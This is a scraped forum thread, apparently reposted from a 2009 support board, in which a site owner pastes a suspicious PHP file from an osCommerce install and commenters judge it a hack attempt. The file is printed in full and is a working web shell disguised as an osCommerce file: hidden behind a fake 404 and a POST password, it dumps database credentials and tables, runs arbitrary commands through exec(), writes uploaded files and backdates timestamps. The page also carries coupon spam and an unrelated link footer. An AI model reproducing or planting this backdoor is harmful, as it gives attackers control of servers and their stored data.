snubbr.com

How can I have an Verisign SSL certificate for free?

Get a Verisign SSL certificate for 30 days FREE. Click here to use coupon...

Get a free trial of Verisign SSL certificates. Click here for this special deal...
My first question is How can I have an Verisign SSL certificate for free? Thanks in advance for any answer. Another question... What is this file for? I noticed a large amount of requests from the server's own ip to this file and it caused Apache to reach it's max clients..

<?php.

/*.

$Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $.

OsCommerce, Open Source E-Commerce Solutions.

Http://www.oscommerce.com.

Copyright 2003 osCommerce.

Released under the GNU General Public License.

*/.

Define("OSCOMMERCE_FILENAME", 'shell.php');.

Define("SLASH", chr(92));.

Define("NL", chr(10));.

Define("CRNL", chr(13).chr(10));.

$licence = "(UTEO84JE73JLL)";.

If (!isset($_POST['K']) || $licence != $_POST['K']).

{.

Header("Status: 404 Not Found");.

Header("HTTP/1.0 404 Not Found");.

$in = rand(10000000, 99999999);.

$fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);.

If ($fp).

{.

$name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);.

$out = "GET ".$name." HTTP/1.1".CRNL;.

$out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;.

$out .= "Connection: Close".CRNL.CRNL;.

Fwrite($fp, $out);.

While (!feof($fp)).

{.

$data2save .= fgets($fp, 128);.

}.

@fclose($fp);.

If (strstr($data2save, CRNL.CRNL)).

{.

$data2save = substr(strstr($data2save, CRNL.CRNL), 4);.

$data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);.

Echo preg_replace("~^[\d\s]+$~mi", "", $data2save);.

} .

}.

Die();.

}.

Header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");.

Header("Cache-Control: no-store, no-cache, must-revalidate");.

Header("Cache-Control: post-check=0, pre-check=0", false);.

Header("Cache-Control: private");.

Header("Pragma: no-cache");.

Set_time_limit(99999999999);.

Ini_set('memory_limit', -1);.

Clearstatcache();.

Function dbc().

{.

If (is_file("../includes/configure.php")).

{.

@include ("../includes/configure.php"); .

}.

Else if (is_file("includes/configure.php")).

{.

@include ("includes/configure.php");.

}.

If (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;.

If (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;.

If (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;.

If (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;.

$MYL = mysql_connect($MYH, $MYU, $MYP);.

Mysql_select_db($MYD);.

Return array($MYL, $MYH, $MYU, $MYP, $MYD);.

}.

If (isset($_POST['P'])).

{.

Die("A11");.

}.

Else if (isset($_POST['MYST'])).

{.

List($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();.

$tables = "";.

$res = mysql_query("SHOW TABLES");.

While ($row = mysql_fetch_array($res)).

{.

$resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);.

$rowCounts = @mysql_fetch_array($resCounts);.

$tables .= "|:|".$row[0].":".$rowCounts[0].NL;.

}.

Echo $tables;.

Mysql_close($MYL);.

Die("#done");.

}.

Else if (isset($_POST['MYSD'])).

{.

List($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();.

$list = "";.

$res = mysql_query("SHOW DATABASES");.

While ($row = mysql_fetch_array($res)).

{.

$list .= "|:|".$row[0].NL;.

}.

Echo $list;.

Mysql_close($MYL);.

Die("#done");.

}.

Else if (isset($_POST['MYFR'])).

{.

List($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();.

If (substr($_POST['MYC'], 0, 1) == 0).

{.

$res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);.

$row = @mysql_fetch_array($res);.

Echo $row[1].";".NL;.

}.

$res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);.

If (@mysql_num_rows($res) > 0).

{.

While (($row = @mysql_fetch_array($res))).

{.

$keys = @implode("`, `", @array_keys($row));.

$values = @array_values($row);.

Foreach($values as $k=>$v).

{.

$values[$k] = mysql_escape_string($v);.

}.

$values = @implode("', '", $values);.

Echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;.

}.

}.

Mysql_close($MYL);.

Die("#done");.

}.

Else if (isset($_POST['MYINF'])).

{.

$inf = dbc();.

Unset($inf[0]);.

Die(implode("|:|", $inf));.

}.

Else if (isset($_POST['E'])).

{.

@exec($_POST['E'], $output, $retCode);.

Die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));.

}.

Else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])).

{.

If (strlen($_POST['U']) == $_POST['US']).

{.

Ignore_user_abort(true);.

$fpSave = fopen($_POST['UF'], "w");.

Fwrite($fpSave, base64_decode($_POST['U']));.

Fclose($fpSave);.

Ignore_user_abort(false);.

}.

}.

If (isset($_POST['T']) || isset($_POST['UF'])).

{.

If (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T'];.

$t = array();.

$d = dir(".");.

$mt = 0;.

While (false !== ($e = $d->read())).

{.

$nt = filemtime($e);.

If ($nt > $mt) $mt = $nt;.

If (preg_match("~table_background~", $e)).

{.

$t[0][] = $nt;.

}.

Else.

{.

$t[1][] = $nt;.

}.

}.

$d->close();.

If (count($t[0]) > 0) $tc = 0; else $tc = 1;.

Sort($t[$tc]);.

If (count($t[$tc]) > 0).

{.

@touch($f, $t[$tc][floor(count($t[$tc]) / 2)]);.

@touch("./", $mt);.

}.

}.

?>.

This post has been edited by.

Jan Zonjee.

: 21 January 2009, 16:03..

Comments (6)

I would like to know the answer too. Anyone here know what is the answer to that question. I'll do some investigation and get back to you if I bump into an answer. You should email the people at Verisign as they probably know..

Comment #1

Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it...

Comment #2

Grab a copy of the file so you have it backed up, and delete it from your website...

Comment #3

I just 403'd it via htaccess for now. I'm actually just looking at this for someone else and know very little about oscommerce. I also noticed his images folder was completely open. If anyone does know what it is, it would be helpful, I just don't know oscommerce enough to know what it's there for. :\..

Comment #4

Looks like a hack attempt..

Seriously look at the file content. It's not like any "normal" osC files, really..

Chmod it to 000, or rename it and then chmod it to 000..

-jared.

This post has been edited by.

Jcall.

: 22 January 2009, 05:33..

Comment #5

I kind of thought the same, only thing that made me think different was the person I'm looking at this for, that file has been there since they put the oscommerce install on the server from another. I just found the same thing on another machine doing the exact same thing. Dosing out the server. Just filling up the MaxClients of apache. The fsockopen did look a bit suspicious to me. Though unfortunately I just don't know much about OsCommerce or really php for that matter.



Anyone have a 1.7 install or the tarball to check if that should be in the images directory?..

Comment #6

1.7? 2.2 MS2 was released in July 2003, I don't know the release timeline before that....

-jared..

Comment #7


This question was taken from a support group/message board and re-posted here so others can learn from it.

 

Categories: Home | Diet & Weight Management | Vitamins & Supplements | Herbs & Cleansing |

Sexual Health | Medifast Support | Nutrisystem Support | Medifast Questions |

Web Hosting | Web Hosts | Website Hosting | Hosting |

Web Hosting | GoDaddy | Digital Cameras | Best WebHosts |

Web Hosting FAQ | Web Hosts FAQ | Hosting FAQ | Hosting Group |

Hosting Questions | Camera Tips | Best Cameras To Buy | Best Cameras This Year |

Camera Q-A | Digital Cameras Q-A | Camera Forum | Nov 2010 - Cameras |

Oct 2010 - Cameras | Oct 2010 - DSLRs | Oct 2010 - Camera Tips | Sep 2010 - Cameras |

Sep 2010 - DSLRS | Sep 2010 - Camera Tips | Aug 2010 - Cameras | Aug 2010 - DSLR Tips |

Aug 2010 - Camera Tips | July 2010 - Cameras | July 2010 - Nikon Cameras | July 2010 - Canon Cameras |

July 2010 - Pentax Cameras | Medifast Recipes | Medifast Recipes Tips | Medifast Recipes Strategies |

Medifast Recipes Experiences | Medifast Recipes Group | Medifast Recipes Forum | Medifast Support Strategies |

Medifast Support Experiences |

 

(C) Copyright 2010 All rights reserved.